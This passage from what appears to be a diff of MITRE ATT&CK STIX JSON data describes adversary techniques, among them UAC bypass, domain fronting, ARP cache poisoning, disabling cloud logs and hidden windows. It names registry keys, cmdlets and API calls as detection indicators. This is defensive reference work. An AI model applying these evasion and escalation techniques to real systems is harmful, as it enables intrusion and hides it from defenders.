UACMe, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:\n\n* eventvwr.exe can auto-elevate and execute a specified binary or script. (Citation: enigma0x3 Fileless UAC Bypass) (Citation: Fortinet Fareit)\n\nAnother bypass is possible through some Lateral Movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on lateral systems and default to high integrity. (Citation: SANS UAC Bypass)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Stefan Kanthak", + "Casey Smith" + ], + "x_mitre_detection": "There are many ways to perform UAC bypasses when a user is in the local administrator group on a system, so it may be difficult to target detection on all variations. Efforts should likely be placed on mitigation and collecting enough information on process launches and actions that could be performed before and after a UAC bypass is performed. Monitor process API calls for behavior that may be indicative of [Process Injection](https://attack.mitre.org/techniques/T1055) and unusual loaded DLLs through [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038), which indicate attempts to gain access to higher privileged processes.\n\nSome UAC bypass methods rely on modifying specific, user-accessible Registry settings. For example:\n\n* The eventvwr.exe bypass uses the [HKEY_CURRENT_USER]\\Software\\Classes\\mscfile\\shell\\open\\command Registry key. (Citation: enigma0x3 Fileless UAC Bypass)\n* The sdclt.exe bypass uses the [HKEY_CURRENT_USER]\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\control.exe and [HKEY_CURRENT_USER]\\Software\\Classes\\exefile\\shell\\runas\\command\\isolatedCommand Registry keys. (Citation: enigma0x3 sdclt app paths) (Citation: enigma0x3 sdclt bypass)\n\nAnalysts should monitor these Registry settings for unauthorized changes.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Windows User Account Control" + ], + "x_mitre_effective_permissions": [ + "Administrator" + ], + "x_mitre_permissions_required": [ + "User", + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", + "created": "2017-05-31T21:31:07.462Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1088", + "external_id": "T1088" + }, + { + "source_name": "TechNet How UAC Works", + "description": "Lich, B. (2016, May 31). How User Account Control Works. Retrieved June 3, 2016.", + "url": "https://technet.microsoft.com/en-us/itpro/windows/keep-secure/how-user-account-control-works" + }, + { + "source_name": "TechNet Inside UAC", + "description": "Russinovich, M. (2009, July). User Account Control: Inside Windows 7 User Account Control. Retrieved July 26, 2016.", + "url": "https://technet.microsoft.com/en-US/magazine/2009.07.uac.aspx" + }, + { + "source_name": "MSDN COM Elevation", + "description": "Microsoft. (n.d.). The COM Elevation Moniker. Retrieved July 26, 2016.", + "url": "https://msdn.microsoft.com/en-us/library/ms679687.aspx" + }, + { + "source_name": "Davidson Windows", + "description": "Davidson, L. (n.d.). Windows 7 UAC whitelist. Retrieved November 12, 2014.", + "url": "http://www.pretentiousname.com/misc/win7_uac_whitelist2.html" + }, + { + "source_name": "Github UACMe", + "description": "UACME Project. (2016, June 16). UACMe. Retrieved July 26, 2016.", + "url": "https://github.com/hfiref0x/UACME" + }, + { + "source_name": "enigma0x3 Fileless UAC Bypass", + "description": "Nelson, M. (2016, August 15). \"Fileless\" UAC Bypass using eventvwr.exe and Registry Hijacking. Retrieved December 27, 2016.", + "url": "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/" + }, + { + "source_name": "Fortinet Fareit", + "description": "Salvio, J., Joven, R. (2016, December 16). Malicious Macro Bypasses UAC to Elevate Privilege for Fareit Malware. Retrieved December 27, 2016.", + "url": "https://blog.fortinet.com/2016/12/16/malicious-macro-bypasses-uac-to-elevate-privilege-for-fareit-malware" + }, + { + "source_name": "SANS UAC Bypass", + "description": "Medin, T. (2013, August 8). PsExec UAC Bypass. Retrieved June 3, 2016.", + "url": "http://pen-testing.sans.org/blog/pen-testing/2013/08/08/psexec-uac-bypass" + }, + { + "source_name": "enigma0x3 sdclt app paths", + "description": "Nelson, M. (2017, March 14). Bypassing UAC using App Paths. Retrieved May 25, 2017.", + "url": "https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/" + }, + { + "source_name": "enigma0x3 sdclt bypass", + "description": "Nelson, M. (2017, March 17). \"Fileless\" UAC Bypass Using sdclt.exe. Retrieved May 25, 2017.", + "url": "https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Runtime Data Manipulation", + "description": "Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making. \n\nAdversaries may alter application binaries used to display data in order to cause runtime manipulations. Adversaries may also conduct [Change Default File Association](https://attack.mitre.org/techniques/T1042) and [Masquerading](https://attack.mitre.org/techniques/T1036) to cause a similar effect. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Inspect important application binary file hashes, locations, and modifications for suspicious/unexpected values.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_impact_type": [ + "Integrity" + ], + "x_mitre_permissions_required": [ + "User", + "Administrator", + "root", + "SYSTEM" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--ca205a36-c1ad-488b-aa6c-ab34bdd3a36b", + "created": "2019-04-09T16:09:22.173Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1494", + "external_id": "T1494" + }, + { + "source_name": "FireEye APT38 Oct 2018", + "description": "FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018.", + "url": "https://content.fireeye.com/apt/rpt-apt38" + }, + { + "source_name": "DOJ Lazarus Sony 2018", + "description": "Department of Justice. (2018, September 6). Criminal Complaint - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.", + "url": "https://www.justice.gov/opa/press-release/file/1092091/download" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T21:01:52.356Z", + "name": "Domain Fronting", + "description": "Adversaries may take advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of HTTPS traffic or traffic tunneled through HTTPS. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015) Domain fronting involves using different domain names in the SNI field of the TLS header and the Host field of the HTTP header. If both domains are served from the same CDN, then the CDN may route to the address specified in the HTTP header after unwrapping the TLS header. A variation of the the technique, \"domainless\" fronting, utilizes a SNI field that is left blank; this may allow the fronting to work even when the CDN attempts to validate that the SNI and HTTP Host fields match (if the blank SNI fields are ignored).\n\nFor example, if domain-x and domain-y are customers of the same CDN, it is possible to place domain-x in the TLS header and domain-y in the HTTP header. Traffic will appear to be going to domain-x, however the CDN may route it to domain-y.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Matt Kelly, @breakersall" + ], + "x_mitre_detection": "If SSL inspection is in place or the traffic is not encrypted, the Host field of the HTTP header can be checked if it matches the HTTPS SNI or against a blocklist or allowlist of domain names. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--ca9d3402-ada3-484d-876a-d717bd6e05f2", + "created": "2020-03-14T23:29:19.581Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1090/004", + "external_id": "T1090.004" + }, + { + "source_name": "Fifield Blocking Resistent Communication through domain fronting 2015", + "description": "David Fifield, Chang Lan, Rod Hynes, Percy Wegmann, and Vern Paxson. (2015). Blocking-resistant communication through domain fronting. Retrieved November 20, 2017.", + "url": "http://www.icir.org/vern/papers/meek-PETS-2015.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-11-08T14:00:00.188Z", + "name": "ARP Cache Poisoning", + "description": "Adversaries may poison Address Resolution Protocol (ARP) caches to position themselves between the communication of two or more networked devices. This activity may be used to enable follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002).\n\nThe ARP protocol is used to resolve IPv4 addresses to link layer addresses, such as a media access control (MAC) address.(Citation: RFC826 ARP) Devices in a local network segment communicate with each other by using link layer addresses. If a networked device does not have the link layer address of a particular networked device, it may send out a broadcast ARP request to the local network to translate the IP address to a MAC address. The device with the associated IP address directly replies with its MAC address. The networked device that made the ARP request will then use as well as store that information in its ARP cache.\n\nAn adversary may passively wait for an ARP request to poison the ARP cache of the requesting device. The adversary may reply with their MAC address, thus deceiving the victim by making them believe that they are communicating with the intended networked device. For the adversary to poison the ARP cache, their reply must be faster than the one made by the legitimate IP address owner. Adversaries may also send a gratuitous ARP reply that maliciously announces the ownership of a particular IP address to all the devices in the local network segment.\n\nThe ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)\n\nAdversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)\n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Jon Sternstein, Stern Security" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor network traffic for unusual ARP traffic, gratuitous ARP replies may be suspicious. \n\nConsider collecting changes to ARP caches across endpoints for signs of ARP poisoning. For example, if multiple IP addresses map to a single MAC address, this could be an indicator that the ARP cache has been poisoned.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--cabe189c-a0e3-4965-a473-dcff00f17213", + "created": "2020-10-15T12:05:58.755Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1557/002", + "external_id": "T1557.002" + }, + { + "source_name": "Cylance Cleaver", + "description": "Cylance. (2014, December). Operation Cleaver. Retrieved September 14, 2017.", + "url": "https://web.archive.org/web/20200302085133/https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" + }, + { + "source_name": "RFC826 ARP", + "description": "Plummer, D. (1982, November). An Ethernet Address Resolution Protocol. Retrieved October 15, 2020.", + "url": "https://tools.ietf.org/html/rfc826" + }, + { + "source_name": "Sans ARP Spoofing Aug 2003", + "description": "Siles, R. (2003, August). Real World ARP Spoofing. Retrieved October 15, 2020.", + "url": "https://pen-testing.sans.org/resources/papers/gcih/real-world-arp-spoofing-105411" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-12T21:13:56.431Z", + "name": "Disable or Modify Cloud Logs", + "description": "An adversary may disable or modify cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable or modify logging to avoid detection of their activities.\n\nFor example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.(Citation: Following the CloudTrail: Generating strong AWS security signals with Sumo Logic) They may alternatively tamper with logging functionality – for example, by removing any associated SNS topics, disabling multi-region logging, or disabling settings that validate and/or encrypt log files.(Citation: AWS Update Trail)(Citation: Pacu Detection Disruption Module) In Office 365, an adversary may disable logging on mail collection activities for specific users by using the `Set-MailboxAuditBypassAssociation` cmdlet, by disabling M365 Advanced Auditing for the user, or by downgrading the user’s license from an Enterprise E5 to an Enterprise E3 license.(Citation: Dark Reading Microsoft 365 Attacks 2021)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Syed Ummar Farooqh, McAfee", + "Prasad Somasamudram, McAfee", + "Sekhar Sarukkai, McAfee", + "Ibrahim Ali Khan", + "Alex Soler, AttackIQ", + "Janantha Marasinghe", + "Matt Snyder, VMware", + "Joe Gumke, U.S. Bank" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor logs for API calls to disable logging. In AWS, monitor for: StopLogging and DeleteTrail.(Citation: Stopping CloudTrail from Sending Events to CloudWatch Logs) In GCP, monitor for: google.logging.v2.ConfigServiceV2.UpdateSink.(Citation: Configuring Data Access audit logs) In Azure, monitor for az monitor diagnostic-settings delete.(Citation: az monitor diagnostic-settings) Additionally, a sudden loss of a log source may indicate that it has been disabled. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "IaaS", + "SaaS", + "Google Workspace", + "Azure AD", + "Office 365" + ], + "x_mitre_version": "2.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--cacc40da-4c9e-462c-80d5-fd70a178b12d", + "created": "2020-10-12T13:52:32.846Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1562/008", + "external_id": "T1562.008" + }, + { + "source_name": "Stopping CloudTrail from Sending Events to CloudWatch Logs", + "description": "Amazon Web Services. (n.d.). Stopping CloudTrail from Sending Events to CloudWatch Logs. Retrieved October 16, 2020.", + "url": "https://docs.aws.amazon.com/awscloudtrail/latest/userguide/stop-cloudtrail-from-sending-events-to-cloudwatch-logs.html" + }, + { + "source_name": "AWS Update Trail", + "description": "AWS. (n.d.). update-trail. Retrieved August 4, 2023.", + "url": "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/cloudtrail/update-trail.html" + }, + { + "source_name": "Following the CloudTrail: Generating strong AWS security signals with Sumo Logic", + "description": "Dan Whalen. (2019, September 10). Following the CloudTrail: Generating strong AWS security signals with Sumo Logic. Retrieved October 16, 2020.", + "url": "https://expel.io/blog/following-cloudtrail-generating-aws-security-signals-sumo-logic/" + }, + { + "source_name": "Configuring Data Access audit logs", + "description": "Google. (n.d.). Configuring Data Access audit logs. Retrieved October 16, 2020.", + "url": "https://cloud.google.com/logging/docs/audit/configure-data-access" + }, + { + "source_name": "Dark Reading Microsoft 365 Attacks 2021", + "description": "Kelly Sheridan. (2021, August 5). Incident Responders Explore Microsoft 365 Attacks in the Wild. Retrieved March 17, 2023.", + "url": "https://www.darkreading.com/threat-intelligence/incident-responders-explore-microsoft-365-attacks-in-the-wild/d/d-id/1341591" + }, + { + "source_name": "az monitor diagnostic-settings", + "description": "Microsoft. (n.d.). az monitor diagnostic-settings. Retrieved October 16, 2020.", + "url": "https://docs.microsoft.com/en-us/cli/azure/monitor/diagnostic-settings?view=azure-cli-latest#az_monitor_diagnostic_settings_delete" + }, + { + "source_name": "Pacu Detection Disruption Module", + "description": "Rhino Security Labs. (2021, April 29). Pacu Detection Disruption Module. Retrieved August 4, 2023.", + "url": "https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/detection__disruption/main.py" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-16T00:15:53.303Z", + "name": "Security Software Discovery", + "description": "Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as cloud monitoring agents and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nExample commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), reg query with [Reg](https://attack.mitre.org/software/S0075), dir with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for. It is becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.\n\nAdversaries may also utilize the [Cloud API](https://attack.mitre.org/techniques/T1059/009) to discover cloud-native security software installed on compute infrastructure, such as the AWS CloudWatch agent, Azure VM Agent, and Google Cloud Monitor agent. These agents may collect metrics and logs from the VM, which may be centrally aggregated in a cloud-based monitoring platform.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Isif Ibrahima, Mandiant" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nIn cloud environments, additionally monitor logs for the usage of APIs that may be used to gather information about security software configurations within the environment.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "IaaS", + "Linux", + "macOS" + ], + "x_mitre_version": "1.5", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384", + "created": "2020-02-21T21:16:18.066Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1518/001", + "external_id": "T1518.001" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-13T14:28:20.651Z", + "name": "Hidden Window", + "description": "Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks. \n\nAdversaries may abuse these functionalities to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.(Citation: Antiquated Mac Malware)\n\nOn macOS, the configurations for how applications run are listed in property list (plist) files. One of the tags in these files can be apple.awt.UIElement, which allows for Java applications to prevent the application's icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don't also want to show up in the Dock.\n\nSimilarly, on Windows there are a variety of features in scripting languages, such as [PowerShell](https://attack.mitre.org/techniques/T1059/001), Jscript, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005) to make windows hidden. One example of this is powershell.exe -WindowStyle Hidden.(Citation: PowerShell About 2019)\n\nIn addition, Windows supports the `CreateDesktop()` API that can create a hidden desktop window with its own corresponding explorer.exe process.(Citation: Hidden VNC)(Citation: Anatomy of an hVNC Attack) All applications running on the hidden desktop window, such as a hidden VNC (hVNC) session,(Citation: Hidden VNC) will be invisible to other desktops windows.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Travis Smith, Tripwire", + "Mark Tsipershtein" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor processes and command-line arguments for actions indicative of hidden windows. In Windows, enable and configure event logging and PowerShell logging to check for the hidden window style. In MacOS, plist files are ASCII text files with a specific format, so they're relatively easy to parse. File monitoring can check for the apple.awt.UIElement or any other suspicious plist tag in plist files and flag them.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS", + "Windows", + "Linux" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--cbb66055-0325-4111-aca0-40547b6ad5b0", + "created": "2020-03-13T20:26:49.433Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1564/003", + "external_id": "T1564.003" + }, + { + "source_name": "Hidden VNC", + "description": "Hutchins, Marcus. (2015, September 13). Hidden VNC for Beginners. Retrieved November 28, 2023.", + "url": "https://www.malwaretech.com/2015/09/hidden-vnc-for-beginners.html" + }, + { + "source_name": "Anatomy of an hVNC Attack", + "description": "Keshet, Lior. Kessem, Limor. (2017, January 25). Anatomy of an hVNC Attack. Retrieved November 28, 2023.", + "url": "https://securityintelligence.com/anatomy-of-an-hvnc-attack/" + }, + { + "source_name": "Antiquated Mac Malware", + "description": "Thomas Reed. (2017, January 18). New Mac backdoor using antiquated code. Retrieved July 5, 2017.", + "url": "https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/" + }, + { + "source_name": "PowerShell About 2019", + "description": "Wheeler, S. et al.. (2019, May 1). About PowerShell.exe. Retrieved October 11, 2019.", + "url": "https://docs.microsoft.com/en-us/powershell/module/Microsoft.PowerShell.Core/About/about_PowerShell_exe?view=powershell-5.1" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Transmitted Data Manipulation", + "description": "Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making. \n\nManipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Detecting the manipulation of data as at passes over a network can be difficult without the appropriate tools. In some cases integrity verification checks, such as file hashing, may be used on critical files as they transit a network. With some critical processes involving transmission of data, manual or out-of-band integrity checking may be useful for identifying manipulated data.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_impact_type": [ + "Integrity" + ], + "x_mitre_permissions_required": [ + "User", + "Administrator", + "root", + "SYSTEM" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--cc1e737c-236c-4e3b-83ba-32039a626ef8", + "created": "2019-04-09T16:08:20.824Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1493", + "external_id": "T1493" + }, + { + "source_name": "FireEye APT38 Oct 2018", + "description": "FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018.", + "url": "https://content.fireeye.com/apt/rpt-apt38" + }, + { + "source_name": "DOJ Lazarus Sony 2018", + "description": "Department of Justice. (2018, September 6). Criminal Complaint - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.", + "url": "https://www.justice.gov/opa/press-release/file/1092091/download" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-01-30T18:35:58.021Z", + "name": "Python", + "description": "Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactively from the command-line (via the python.exe interpreter) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executables.(Citation: Zscaler APT31 Covid-19 October 2020)\n\nPython comes with many built-in packages to interact with the underlying system, such as file operations and device I/O. Adversaries can use these libraries to download and execute commands or other scripts as well as perform various malicious behaviors.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor systems for abnormal Python usage and python.exe behavior, which could be an indicator of malicious activity. Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.\n\nScripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_remote_support": false, + "x_mitre_system_requirements": [ + "Python is installed." + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--cc3502b5-30cc-4473-ad48-42d51a6ef6d1", + "created": "2020-03-09T14:38:24.334Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1059/006", + "external_id": "T1059.006" + }, + { + "source_name": "Zscaler APT31 Covid-19 October 2020", + "description": "Singh, S. and Antil, S. (2020, October 27). APT-31 Leverages COVID-19 Vaccine Theme and Abuses Legitimate Online Services. Retrieved March 24, 2021.", + "url": "https://www.zscaler.com/blogs/security-research/apt-31-leverages-covid-19-vaccine-theme-and-abuses-legitimate-online" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Identify Roles", + "description": "Adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business roles may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open 